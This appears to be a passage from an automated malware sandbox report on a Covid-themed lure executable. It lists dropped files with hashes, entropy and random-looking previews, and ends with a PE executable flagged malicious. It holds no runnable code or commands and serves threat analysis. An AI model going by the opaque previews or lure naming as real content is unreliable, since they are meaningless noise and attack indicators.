                                          Preview: 0Y01471E8p26d84PG9g4Do03C297GAqk95qZ4Z12m0JJ8vs2877y96Y27770..e2g8YCl7mQ71dJ1Z4x6P257tm08S56E7Ie1vl8c35P6Qun57au6G9G9r2RQY6z58CP5xmIo0gYv970522F9bN8Y0v3b8pc661..07Ms86H9va9U50N7v5GPwk924u5xEOJEL8a9fyUqe49Uz5TBm779FIPhV65vAE55ba8yG9f7jSHs..7C8o851y8v4Ud5uq4k881Q0lRP5z7tXe9frA7KQJKoiZD070UWcV91C5x6e7X6B27TjE31vd06477N5PrJ5X346577cic87v022S3859euUPcaP5xB8Q..3x7N0ujgh299zW37H2p091Zv18th32co70968kK9eL27dP04wx4Q52LH0y95DU5716A1FOj449HDF2k15W683Gt6fbzs6UH8V6981506501q030QxqQ718qhQ61c214618Kz47LX9b8C22c600OKl910vNmH529K5tioPq2C7S2nhtfj27..
                                          C:\84086963\thummq.log
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):517
                                          Entropy (8bit):5.525071060081313
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C2A3FD1A529544E7E78EEA8DCAF37736
                                          SHA1:D69CB795A97A8E1CD3B1B114834229A0E86A014E
                                          SHA-256:DD78F8E90E403EF4503289331572638468ED6D484A493C2689B6EC78BD9566B3
                                          SHA-512:B440EA479BB7A786CF07F320DF5D0F46F26396426EDA4C4E5855399EA8685711C5EFFCC5CBE1D8BC51F3ADEBE2C6841C4952D7656F61CFAA8AA7D045794E7BCC
                                          Malicious:false
                                          Preview: 2Vh14if5G544yE940Z4ik3v57qMYdtXZP7q11j8lG34ub25axIbFeeIv155Op6l8S11130..4y9f6iUzeAh1jj5Hv174Q10g1v685J513E4O21gsW2NbpD72VF4nu5U915..S27Pal1zFn76395t14KNv7w2e1aLLsdytLKbTZy99skJ2cRbut1189x726..57al9ujq4tA2DF7D4caFu08W66EPKL409830dc1kRs6Vu7LPeMJ762axKD1S1799f4Q05f9O91SuX6VxP7822vR240440UOl8ce2IQ0w2Mt57IWAfW6G28..5WOPf0372766f63374nFgrw28mo8b288p21c6Zp31kXPJ73F9r21ias64GX916Vv81h2a547608X7Mw4vxw775328krV4P4Su373..53p42X35T6q1U1g5499fpz9gyE2v1q4Wn69M0KK1T77NHoL823Xb703qL4898nT7775m8717hKB87Cg..MKh6657xdI6rH3jN8lc9..
                                          C:\84086963\tsewhsbwlk.mp3
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):585
                                          Entropy (8bit):5.545025988403711
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5DAB4033A97F366976B897E46EB24151
                                          SHA1:E249DE0649733E3CFF2E5528C90D6E7DEFC046F4
                                          SHA-256:D6A9C6E5CB8A2BB4DACC7D86531B764EFCD0A247C485A137BE576E8832790688
                                          SHA-512:7A0B8D26BC7854637E4DACB7F115E6458AE411F26557A544D368C9E34E7225ED5B0FD479398CDB2007C7D182F8744AFE06C3FB993F6B3D7CC5C67C0EA3BEBE57
                                          Malicious:false
                                          Preview: 4YPyZ98iNqqlJ81jG6LvDYv65f3r1zpF3Fo98909xvz531P9VhSDx..L1gy8hx4Gje91DvbB..774X1PI3AU952905992gd43yauy5T6c7l9I451Tf344O4PMdGY512d7kqba2lW0o88730oH7t01Bo5tvHX1n4c6Wz6Yf34gi9I6S49..Z538sRskRD370aPl0PqNO10Bm16K90Y3emLOoNmyn6g86P79..KQaD5D15Q28I44xv0J93PY9By30j5WT9p40b64c18rxzmt5fU898870Y1B918wZ2fDbx7Y6a5l6LdR82uG9Ze331dpx0C3..5r8xk38230Ze9h4i63JGK537J84sbe436D86S161339553I4V9hf0hBW4c802w50o401Ds02V2c3A9C0F6P0igh9E..RP9zE13ot3CD89j9U21z4nt08kVM5nTPP9jj93cCW4T6SwV72QSoq3C52QW67qN9g9Su..30O9BW2m1iU0v6tY18g9y951366Z6gQZ1V4r0M89w35C7H783JSDD4YGgT984P2UV7G5C9563S3OH00462p6Ck768tb8pw5q53..
                                          C:\84086963\tspet.docx
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):505
                                          Entropy (8bit):5.58470838230856
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:6EA9A9B2B11690E9E3B869030A3ED30C
                                          SHA1:D0BD36830C6BCEB11D147C6757DF79AAD1C3A97C
                                          SHA-256:4B973C2BF7EAFB4781C47113B0AFCB779AC917AE0346C1794AE5264C45E21FD9
                                          SHA-512:9F8D1A0D6DE57C934E2DF1E3C3B5A59388256CE80DD08347AFD5530DC5CD4CF235FD24B7A2860018B92EE4967F860D96238A785DC5E55AB6139BE2D6A1FB2AB3
                                          Malicious:false
                                          Preview: 81e7PuQ4S24Z31z1aE65sBDw433913T3O5k351E38X3cH..2VAL9uXsrS253ofw..cVzLTV9vHW402caoCU6X41v5754827s85nt06A..4GFWY9si2947..39LQ9s873Z3hOC3h19wj6LCY2CGQ3rr33988WQ06o0781SYUp74aL134s8cLu3i2Y99r1562BhjYC5RNMK2HUah6V4K775s84iEam7Y2ulr53QLHgvb90tYf1a991950tgSCV0K..xI7XRK30LP8OI866wxGfPuz..Ulr6e5yPvLp2Abn1sn54703m84ibo6I6dBvJh5Gxhlkovql0o528kJ8aO9OrvKn07xWMt9x74g464DPf1VHi4v4P4JofAa9SP8766nP2rsJH3..9Q52h8o8eCcQRa53x25KRi1K0Mg24FSQet102h8EB65ip0so5Ef54407hI1Kr411Bn4a8vRGvK6154276x68957377I7ozNk5f0p1ok3KxI7003..
                                          C:\84086963\tvat.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):515
                                          Entropy (8bit):5.612604697200153
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3E81B6312BFB5170E0D5C7DB38EFE2F6
                                          SHA1:4369FA15A7EC69289D9E3A58EC551C5D2FE0FB73
                                          SHA-256:F5513BFFA231E7706D0A8F17F415DB1B5C0A2716E331EADF7C271AE4F3B219A9
                                          SHA-512:7329FF39FE9D9B233A27F000CF1992849912B56AD1629217D069D151F6006EB9D82AE0B5E43A8BEAA39242557B78F098159DA6773E96A27D5B1901E92B6F9421
                                          Malicious:false
                                          Preview: 6N393gJxD1YX196P1uq7w93061Pg1GmF6KM9t3y9Fkn9a1r6E9c0..9BH994Mb366ztC6N8L1A1cUa8oU655j7Pb3J02B33WmTJO5evZDc6s977TEz207UC733U6xz9dv1QcA5k8Ls4t32..14lq0CL668skxq32522fkrMyjV4m49G46kC13rF9mBHG78492kQbWTtN1AS6T34u324e3MPSVo65ZMDo76N0Jx3L9U..84e7U932I46o3FPW94Jez43TV40M1ruv4GHJZW42h7Slnu6G6UTI75n3xru..99z3t79G97B96342df7408T5jOD6R2Vybs4d0SCsU78PvD5zEDRbGs5c1H2lU0v2Od0621r55LEmnYir6Gh9m6kYoc8..785I0108660Wlz594r73yhH5Q4XdbY2P0sptgR43pL1u0m31U805c8BE5eMsrQ7e8E..R8K3Uf9B37j53v0h6I7WWZ7fcwla8pR9i4E48p04dD9p3kP92nx4vC6..
                                          C:\84086963\uhwaulbhaj.ini
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):507
                                          Entropy (8bit):5.535701019505548
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:3C7782675094A1A72BA467E2AD72E544
                                          SHA1:D3CC43E9069AB7FD660A74EAD396E825FC800BD9
                                          SHA-256:9175A75D1F5129ECF1C97B76413021D969A4A42F2F19E12DC57660841B4108F6
                                          SHA-512:EA212904EDDC1012CA1C478AA0CC7ED8B9531F48F987B49655DA693DC654B48C341C9FDF95066CE8E06EE1E8F0C92E3091F430AD57EA165F359882517581CBB3
                                          Malicious:false
                                          Preview: A0m1H0TtZ5P7pJ532..94fV3T3SxkZ9..32YNfR5511xh4yc0l9j224Y7Iqg5449Y38YR82C69789Ko5r7z055V097oT64a537..T9CfnFi59t1o44IBEjoyB2uG244vG5Dx5CEG841He033b416h5uQ6V3190MLcBE707s66E3zt4713..55936w3704yzp87H4I9gl79yo9uF1br050K3X2HmyLzqZ91kM88z2s8YaP7A04ujY1nR45067582AP95j5g5838b3853wa79Q4BxzLc4I2dbUOA0p2Q701F21saIvIqe660r246u..3u600c50..q2O7TV7NY14mQY54pnwOE5V19Mx9qr6zG31541N07n2vy1O322818r71I1g8aH7fE3WB8vrF9Xd6mY..xh3gpQo251DmJ6942T9v5Wa5t411068okSO143V7bl4v7Cb0fGLDQ6HLAFEayeNF7FqiC7908yg1JCK6m1901LVKwVR7Jnu93C..
                                          C:\84086963\ujfjsealdj.dll
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):552
                                          Entropy (8bit):5.5200539853409385
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EA4C4D4C4B4E1522BC7CB643F915A1F2
                                          SHA1:705535D56E94B09BC62AABE5E4B666859D70B348
                                          SHA-256:3C54B0FB2173908401760C6D41CDF4984B0ECAC8800EEEE217479C16F9E4FE7D
                                          SHA-512:41D7B528CB7F5FB0921756BDF00ABE5F3B7ED7032CC68F0CA69AD2A05166BFC8547EA2D08ACBE920894483D0BB284853451C87553AC0F65FCD0CA25AC05C4482
                                          Malicious:false
                                          Preview: 01I27KG093pk6hfhc95e1J01Z0K399Jz04OBhgKFY77..n1o4sWb28Zw27lU9507g2e6N0k9j38096pRo22fM38Ig09b5P34T6kLoyAT676W6957Rt3dkLrEo5AWhb7R9AD1mpt0559i11s6Q7114y212VUECU50mgAo51Y075..r15056e3kWwwjO8i0ne9VgF4V8m57rhA94x249Nv3e4kv0S08h956ne7E19Q1S5r37Zv4IPQA6Ju7823Qb0v8GP8qwi0889MAM1134aos3mI23p6dB2sB2zafR74g6i92..k8PKvqp8687o367622dPD1F33H6uv0j19oX5j4VpC285UDaKp999Q463375u4FFoPJ72xmVcMEYY48p3LBXf283Go6o3oydWQ9e285Y5uSZ8N382Dt714wC3Xs84GCY6..jt01Y8DVLT4Y690666x5k9sUO7lr626oUZ2w10i682..2F925526o7t0r927QiC2i42eJX2lYyij04857pK6Xj03jk9FFsq558z80CQ9e4y75198uox42..
                                          C:\84086963\ujqwpom.msc
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):614
                                          Entropy (8bit):5.528625724425723
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:098314D0E33E12701A8313CD91D77D45
                                          SHA1:5296EEEF877EF9AC70D7FFB5326DA46A7590A678
                                          SHA-256:A84005224532E72B8C3A035418FDEC0C6EBE552928427F56133F1568099790BA
                                          SHA-512:EEC398730027B9A0DCF701FEBA66775F6E8987FD07C584857404137B632C73B0CAB65DA24DBD9B41C978722DA6A9ACA5AF199B401B86E75A7968957A7DA4B0B3
                                          Malicious:false
                                          Preview: 25H7457nKoM744j29vP1GMJU6Y02EEG2sOU0Qhuf4n6ZaD2g..4Q2053Ri0WeJmDjQ7vLf6U95K3s2R29976s958rjR6A8hh7HI1m251y7181ps40..k6v3xYWxl1d923g0wTp5217248o8nXj7PmmQAuFg56k034ugaaq61VN0Uf851348e2528jQO81R03d06D335Ii210D92Ub..N2K2Lar2OP224Y8rn46vd6D1xJg7AkgLt0fwEitZMAO26W858647pv13i93rOS3V3R8Uc233S..10l78fc34IGnN753hx29U9n05W7587t8s9RyzA9I9jB3IjS3675cex4jF76jA2z49n9624324444LM8kec1J4..p2Z5BCy2PkLf2s7RFFI12l12Y49Ia2k199I826t394wZyTS..0I4Rxn2g4brDt0493e7r016v96PY89fX42j8i7U49b393598r4xW59njxLoY806857U7110s7085SluY88K41a0Pd5v78Um1G17dd1Wd4guYn4ee7Ek66j85V03tqvq607pjR324S5N00FdEm7Cw48rFwJ50B8wOHNU4jgc4273fF24U6wkpZ1lE46NzSW..
                                          C:\84086963\unsdkvxll.xls
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):572
                                          Entropy (8bit):5.520168614508109
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:204150CC5EEBE21EBF05292FBFDD4E12
                                          SHA1:2F717BB029F7376AE43ACAA27BF10926B909EC9F
                                          SHA-256:82C198F6D99DAF9ADB28433F67E2B4B938393F1568273F9E2098850BD94C8CC6
                                          SHA-512:8A27FE9B0A2384BDDD0F3E80CE715721483C66486DBB1B1501198C2E6FDA3D8CE38B1A211B058F324669D82C6A5E2A2DA31C3B2A3539422639639AAA6AD39516
                                          Malicious:false
                                          Preview: 5Y3538499992jw2zEJQ6461YGo5FO30455CME34LnSEZH5F1h75l0tt5955gzf82QyG1fIh9TceuT4exFo2MRL2SiX1F2A0o811c58zkhq95l620q..67933h5i4A2Q6p82RbdSiaNj5xN87KSI1738F03It158189d55Q0e9e57UnT671H1RFZT126U31Cr48381771677UaQVn6A16AX7dFq07t..84h31rRV3u219Z8P444t81S77AO5yu25k67XRDdUOAH4KnMrZ07yvu1V007BDid389G0bR54E3mz28Dn4Uh660z1j48W4u93201DnwJbz669o2HVMcw54402zbr645s49MVDHUZ80..H81w0C1z050052eO1S0Z5vLhO5sK19v03cMrwUaz9Ud4m7QG61EA8Lq4jY5x76Oqh3XRJpd85219oO043..2t70rHdl40R0U9NMtIR8EF6L8264m09s9F88H7u4SFrf5o78s6R460E5NJ620014OiHkLTv7g9egX1j39Em7t257ygV8C45b2TOmI4V6oa5b86o24IpK813Rscv13..
                                          C:\84086963\uqai.bmp
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):510
                                          Entropy (8bit):5.469651540544045
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:465189370EC3BDE0E30A20C043977627
                                          SHA1:FDCE1041C78335E3C8C7FB2A4E93DB43A81CF3D6
                                          SHA-256:8110FD82D0875176FA5D436317F3358866C20F2D96A1809C163F68CD2F5C315C
                                          SHA-512:C22CCD432B29C03C6DBCF63D17EE3F186DFC7D0A2C0C37CB69A4A3183C06E0D6B44733729C83205F7878A6F9A707117B358DE462C8470F207A02A0A0DAA4BD9C
                                          Malicious:false
                                          Preview: 6SgR450V7CVsC69Iz793i6Z6Ynh3Z9bhE189OF4I9dNmN926I4JKdUBI8Ig514216I7wG738z81dN4P41L4e12VW962Jzc4786xFC8132554JI2Qj7o9lYY1r18R3F8Ax5KT8fM6R2h7523hCn9660253MjjFe6YL19haZ0606..7W6QJ57Tc137c23sE68h02O9s75lR83o95lJ93303nC57FCb85..W86Xqk1o3I24m5kQP81b3904gh496r9e2KU199h430k2WpTk08vt2412BN23kS21S85os0U48nbM495f013Egc2fxY71QOJMCZrG288h61T6k9u54yPXAggY32320tvBX24RG9kaoPF9gs9v7220vQrMKG2INy25R0O495pu5h3fWy9jX16EV2017194r..sB00d7245NNdC3FjY49KIcw9e65M4800F1Wa547fZ3f8Q727tm917bT..E18jy23QqStK2M380L10E5614A..v7Uwt6A9..
                                          C:\84086963\vihccpv.exe
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):584
                                          Entropy (8bit):5.432846232360661
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5C288EE7FEC35B7BA0746120B0C9C176
                                          SHA1:DF5AF987BB05245153499C926984F3373BBBAC23
                                          SHA-256:905CC9E8DC5A7C1A6EDA552757BEBD3D97AEED925984FC80DA05892F9F6E92A8
                                          SHA-512:7CD2C549577D321C1A4C020DFB7196DA1A87F97F114183373E24D34E9FBA8491B28899676F8010E2662A86791F42A5E03C43638D985E53DBCA82749D822C1D4B
                                          Malicious:false
                                          Preview: DF6T70850pQ0s1lewW96L720R9E7x568412fh3Kz985z082Y2bp26zzS8O43US321e324800V2G49S2wq0540R6..1t2V80w8Rb0pA5AFVg3sfUgCn2692l7y97vxEc490L5298697v..69606L9YlM1PY6I970037hZ663539U6Q6NM0p7qRJj2649D..l3gFV208Z0Cx6F1826G3yHY4tT2H4mry5ftxd92jd412u7Y8vav6824OA4548..0pQd6er146u4561jr7b0h0Q86B2m02G118J8BB5JC3FUTkSPx025hYqlG8l96YIXflt37XZW015975Lj8Slc95UM6g5..pfbz9VB074Md2nWh6sKm41x4N293515468Iqd219xK84EW22r713aT3I1XBrij59f0J68Nw452dIEM394MB3m6B9b075SaJTH3K51e6sv5U9C9T2b..960uw07G2Q9X4N574sP8e9539..i1F71Wbzw91571a77RO06fB620yL2j7447h90R53u5Z7w8B6627W54Eh6PY9xHahh3q56610yh1977I0907gp5dvIWb76n..
                                          C:\84086963\vilxemlqie.txt
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):557
                                          Entropy (8bit):5.52837233955466
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8523D150BB595B191A38F956BF92C498
                                          SHA1:A4FE55E00792B7E838D4557A5DD5F69ECB945895
                                          SHA-256:9888C8D6AED250A05AFB480B7872EC8008FF0EAABE4D4BABB17C5C7EB53FE511
                                          SHA-512:D127AF7F33FBCE315E23F2EF9248E36732591BC90EA52157ADD6CAE35097E86ADE7973C8B59FC31D88CB26C507218372857CA34943AE246A48923370739C8EC3
                                          Malicious:false
                                          Preview: G4Y0cU43aJEStE53t5n3..n8COc1a4923OZ2xr132Ku0f6s7FHJpu93F1B459sky3195Pep14245174G187Yt1060L7v58p95kx9hA7JZ60I56433l23543uK5o3MN83zYbMnkD650656jAEhE4..7h00..5m1GjoY4m98M7xr8g4W33b2r5q9gFB14P4zc9u76v8UZpxXm6211je8h2185m..E229oV3k90cIh5Sj66P12xtKZInbwtn3Npi9j0hyS81st0r8l8248l6jO98iC1q7e..8GtJE4T74642ce16989r5878k8gf015Ylyji9AeQkfvD3274iK..1H581e5x30H57b4a0R5x6DIDc99QYr5VM0uWQg..2xFm2Y2YkA9Hldl1AR10q37C315H6kQPJ9W143WY9..60tY0Fj0059qNe96s63XS5yRL840kCqwnK6EmV4703T17584J38j33h9O62Y6t35K69b0Tc1..L140tFvSup9039m61c6B0493mT2121xRQ7HMk8Q9963foPKtCyATJ6Y6kA4UI..
                                          C:\84086963\vioefncov.cpl
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):601
                                          Entropy (8bit):5.515683621328262
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:FF28D604C4F77D14D914F34932B79EA4
                                          SHA1:62F0142B68902C4CDA59D3E6F9D4DACD630A52D1
                                          SHA-256:822FE6C4F4149FEA2323F9355F50C1D7449D44F7068720D4D2D0DEB27B031DDA
                                          SHA-512:97D09C7A6C2D3516CB95CE875E94AD2AF0A10B13CA18CAFFFA01F3EE9D023BB734F51434E635CB51CC59EF4544FC8F8F770C69F9A2DA8B5BE3BAFCB2DD78E2B2
                                          Malicious:false
                                          Preview: T3m6823pO523h37xzlRW0a49k10Y6EM7kLAAngJzC3641eEZ5a2JY4qEcM8kAFtzXD4NoR176fl787J0866k24nZc40..prK4vwd9g5yX538Azb320761oU01CWIm62FZG893MiC611mq911T87Fah3go4d154ch213E0XjL7ux8tG9dY71qene..Nk0T9w7duP66122TsL4W61oh3Mca7Os6d2K8T02f12E8j41Wq1vW6ap2M195AOi642R0CH6r21vHM67m731588lppkjqI715488jK104Z4709kZ3Q4cAAj08GZJ..7Vq605K54z191v3Qr35K8fb480Ziw48U6Z3313L358I1K765vtd4023vhm56JY4St0o5c5Sa540yjm04qYb3f39I8U6i88f46P7HABcl7DjT45M..7115N2973Gs2Cy84364N08xnucEc01T20Y9A0GW..M5S40m4e3BM51U7iC3v6MU2737067n0DaX2kVA4KAlg66cl4w584i47Q75k0B4639M536E5hq0jR55397VNiP66FCdRk6y67Yb18veqFo1aZ0ZG2AdsN3h70SSiZ7dwT28708d6..
                                          C:\84086963\vjbwupem.docx
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):507
                                          Entropy (8bit):5.455500727748887
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:145DE41EFEAAD2F8F381EA8E3C707AB6
                                          SHA1:EFFA5BF68678AA351FFABCF297FF3041080F23FE
                                          SHA-256:98677BC9FF191C1A0DC9375C643EC524C83C117A1006FB19E92B48126DD7BD2F
                                          SHA-512:EAC583E80DB3D15C27017165A0BEFA5EF738CFC5EF6F8F007AF0487B17368D39F56A0FF161E61B5C4334C4E9BAE536F11C91641DA3AC835EB013EBE61AB5CEFF
                                          Malicious:false
                                          Preview: s7a2149mL61H21458979zSP7FZ2e03Idw1X99..g7F26q042708NhTNKhk188mlKacn3GB56eN1IRdi50z5IDTU439411D1190w41Hr8dx4wV7248dk279WHB166466g0T87YN17L6k6491947MK5g042v9J8b9SnB..4J4XDl1fZ7nQ63dSMH871d0a4vp6f8U0rn4L1Y8a9O962E4Uk03iMr9oaLtfvpl893Z2g4ttKq86wH0uRK56YnYz3cIQ8Xoz0BLn743sl5c9g3..L7N2i3597HzWb55u88bnUT625134K6sxL3A694rh95Zad9nqh8496mG154F60699318985U35T37771..AX8L4S53c2582R5Aj0O600n18Hk61d8B7van6rr4ZmvP6nB094048650r6ctQpt0A74q1B5op3PGvnw771y3Wk3941d4Ji7X9e2H486kT639t65cjN131F2obsD7Y4xbas8870wphV17vC8rg0uV..
                                          C:\84086963\wcxrx.dll
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):507
                                          Entropy (8bit):5.641654857494775
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CE11ED836F2538E430058444C39FB10B
                                          SHA1:AD6133FF3F1E3FED2185055FD254E225504944A7
                                          SHA-256:D18E2F6563EA2849AE6966FFF3BA947005CE91C86464C00A3F2016DBC52993D9
                                          SHA-512:6AA6C847B9123DC758AB0EA71AA1E1B979EFDA44FA440E9E498B871DCC4ED7FE6B50EF47A769DE637774066C842E51ADD1D08F2026B10403D1755DCA36CC2A99
                                          Malicious:false
                                          Preview: ls4840Rp86Ery2c2zsPA6bIJmD..Alxu50XX2kq55qiC5qkEPdw2ZW77MlN65SGq8xYWIoU44066FsFfue91a9904U15hiutA6JP89o4R..165573LZx6SONzr3K87Su7197O8IRis94qW422v9F5b2zZqenPbu9tA..Tx9geAaVf0i6BTQAl413G6384uj93vUm2MzbymI4qwM..P4F3R2p98qP58FPFd82HTDWD40895X41CFV3NjEuG5y691n27hO49Jio6k4PMD03c9i2C5f253wWK6hn9H2285S844Nj3A13hu409R4dG474np8q7u86y34Mt3HFBg64z04j39ZaKRk92A58S06a09N..a0cdgaOx4k82H85q1K1vQAi9IM24V08K9v3YU03809CdQczsh6dk94i77l7O8W1KiD5h2j30bMqn3mW6748UGni215AxrlaTP75HzTLmy9E1p173Rl69F734000m9qKvL3nPeOirm06Oc8a..
                                          C:\84086963\whuphgwhd.icm
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):517
                                          Entropy (8bit):5.524768458887234
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:EF92C75DEAA5D03B87442B4B624B1E9D
                                          SHA1:02A443D06663D6CEF5E9FA6BACD6BC17AECB4B41
                                          SHA-256:80098C60C20F19A6B85A99D0AD10C8DBB82A3E0136DE8DFFA31AA767ADAFB49E
                                          SHA-512:33544754EE9DB9ACB591B5D1CC134FC99E1DAB3F076FF792C230E28304F28F29BD9541CD1E64FBF1C04B7704CCF1C4CAD6E4631910F1DFF577EB7FBDA43C0FA9
                                          Malicious:false
                                          Preview: n9zDl4B2K9qn8gGt6tPxW0rb5F5j798d0U6p101YoJ240711lB16Tfah26UxjCK08E4J9TK5700B54k3hb1VPi4D90EHc3P61C10063U7q7d6h3W87OQ9xg37hJ5qvd3p7I2ZP2iO2wDZ7TkN..v37Wh0B6yE6Lxo14E65627bz31j032..hb63v35572681KSs5SKF8..2R87IHZ91818QbBL14Kq4413hS6I5L6wrr07DI75uN6TXgPhX0Iyr147o96953xlg5C2TO1C6g07648Ela1R8R9yQ8..Or212L6uQrezJeQ578Y92z7Z6xC3595u..VqIv1h27Fp73518Q2QGe5dYp39LPl1R6..66Y40S5tkMOMYBlR4N090T9151w9td07oSiUQO9728f6LU..2A6mlmn38h117K872V7yj52224Ki8x79GG20cQ7b3R11uk48853jc2n2lh8L2247SJ8vpG2dgXW45e25mz3l2v4ziFz1lHx6i022E0781..
                                          C:\84086963\wnjepqgt.xml
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:MGR bitmap, old format, 1-bit deep, 32-bit aligned
                                          Category:dropped
                                          Size (bytes):507
                                          Entropy (8bit):5.522948201942726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5BE37A6EED05E60FF6946196CFDB0829
                                          SHA1:026B96D1A0B65063159E99B698CAB0BFE6820B8A
                                          SHA-256:BAF615CFD2666A9A55BB370275EC639021AACC5612A6AD34547AA33201EF666D
                                          SHA-512:26591FAF0051DE6A09C094E63A74D6BAB923E72EEACE2F303226D0AF2AC8D23CCAA47388330513B68C5A1BC67138177AB7B00EDB384C61265DB34FC8887E833B
                                          Malicious:false
                                          Preview: xz74sG565bkq3X3H0D4Db83608483s4Den3csP6062n2A908n227C303Ez44K3nJI8N6602a9ZN8PHgJ0MP4lg6sM1l51d0K1O6Xx420lAx3w6a9R2dyK2Qc31vm67u6Jad193mv327Q4h1..D11n83WLa39..n1DlZ633rLv38W521222hEEc9CDuk690N22eyzKnP61A1lG711yo25n293xg16J1uN..2R70tNYxVtb2dl3v3wt00f553sL11l2907i7G..wp2oqKIf5sL4xBiXHEywq19s806XsrR34nF684ej7g8PBU4079292LU4P8ldz44Vb..3HVNN3670Ib3L7002v4PQFVM2w67awuP75c5TP9a4bws5HzcK3pk6cU9xf3GYvka9Tj5670423R2..k34iP72RYRD1uJ89s17y258WYCqEa753vy26OZ3r1..1I87PJ049R443Cp891cC5905I8m1fk0iqU2N0IDGgL4uHw64KN98..
                                          C:\84086963\wtranbfvgl.jpg
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):502
                                          Entropy (8bit):5.463862210286423
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1936BD3D226B73CFEA950034D3A9B4C8
                                          SHA1:D72CE40E67AF08E026CF6777402CC9F39785A4D1
                                          SHA-256:FC04BB0DC3B2C6B8961AC3B27E045B5FB76A8265E83DD87AB9260980F83E87D8
                                          SHA-512:30703952D73824ACAC4E325C109D6F0A77F952FD683B024AF2E0A07495450567DC22C697F279382B5681422C930146A1F007DF462F9152BE0A33D2568DF2B8D6
                                          Malicious:false
                                          Preview: 8t1J1O973yR25Z2S7hgqsr64930l8EzhdPFjzarTSU9110xO0gR78gl93p2zu57106c5jny07g53qv5W38VP0y0r83II6OL0H38AHUjH4z7985K4S8x6n5f8f96124161t7JvEeZ41zhlgW292a4m23m17jexL0mWx244M05p7Pa8bX8D33t5464u..7d4ZgO1532H92Z3UB..Z5uc9Y12Vfp7n0Jo96xic9f41s83cIK4I693f9865lc482SGS8213l4296ev3H258..1NmIb4dhGHv029C7D998f71p0v4Lm8..0A469q0419WEFToSXi43l4SvOh1sE4OTz805F05d4D6T0B2E8xliU8Mb792E9cZ32606x3Iy2C5e8tS8307t5TO8462t532Y9s0Z6x910H8d5V5U0w69Aw83026I397R087W5637APf4v19883wGQ2u7Tp3436lw4686GhK22Jl6nek9NuMfnqER9Q6g31xJY00..
                                          C:\84086963\xdhqeufpq.pif
                                          Process:C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):661744
                                          Entropy (8bit):6.575295279326677
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:957FCFF5374F7A5EE128D32C976ADAA5
                                          SHA1:72A4CC77337D22B5C23335538C62BEA7ED9CBB93
                                          SHA-256:699534A988A6AA7C8C5FF4EB01AC28292BE257B0312E6D7351FB4CACAA4124D5
                                          SHA-512:E9DC65FBB964CB64CFCBB1C9B5C53595B0F0304A7179710DDAC5AEFA2F0F40BB67271B7AEB39654254C2FE68FCD62B77A94674B8E9C3A57AD3497197EDE87CA9
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Virustotal, Detection: 55%, Browse
                                          • Antivirus: Metadefender, Detection: 31%, Browse
                                          • Antivirus: ReversingLabs, Detection: 50%
                                          Joe Sandbox View:
                                          • Filename: PDA_pdf.exe, Detection: malicious, Browse
